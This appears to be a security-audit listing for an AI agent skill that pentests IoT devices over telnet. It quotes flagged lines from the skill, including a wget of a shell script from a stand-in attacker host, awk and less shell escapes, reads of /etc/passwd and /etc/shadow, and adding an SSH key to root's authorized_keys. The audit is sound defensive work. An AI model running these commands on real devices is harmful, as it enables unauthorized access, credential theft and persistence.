telnetshell
Enables interaction with IoT device shells via telnet for pentesting, supporting enumeration, vulnerability discovery, and credential testing.
Install this skill
Security score
The telnetshell skill was audited on Feb 12, 2026 and we found 18 security issues across 5 threat categories, including 7 high-severity. Review the findings below before installing.
Categories Tested
Security Issues
System command execution
| 13 | - telnet client installed on the system (`sudo pacman -S inetutils` on Arch) |
System command execution
| 442 | awk 'BEGIN {system("/bin/sh")}' |
Wget to non-GitHub URL
| 242 | wget http://attacker.com/shell.sh |
Access to /etc/passwd
| 169 | $HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /etc/passwd" |
Access to /etc/passwd
| 293 | cat /etc/passwd |
Access to /etc/passwd
| 440 | less /etc/passwd # Then !/bin/sh |
Access to /etc/shadow
| 294 | cat /etc/shadow # If readable - major security issue! |
Access to root home directory
| 368 | mkdir -p /root/.ssh |
Access to root home directory
| 369 | echo "your_ssh_public_key" >> /root/.ssh/authorized_keys |
Access to root home directory
| 370 | chmod 600 /root/.ssh/authorized_keys |
Access to root home directory
| 371 | chmod 700 /root/.ssh |
Access to SSH directory
| 369 | echo "your_ssh_public_key" >> /root/.ssh/authorized_keys |
Access to SSH directory
| 370 | chmod 600 /root/.ssh/authorized_keys |
Prompting for password/secret input
| 424 | # If you encounter a password prompt, the helper will detect it |
External URL reference
| 242 | wget http://attacker.com/shell.sh |
External URL reference
| 404 | # Then download from http://device_ip:8000/rootfs.bin |
External URL reference
| 535 | - [BusyBox Official Site](https://busybox.net/) |
External URL reference
| 536 | - [BusyBox Command List](https://busybox.net/downloads/BusyBox.html) |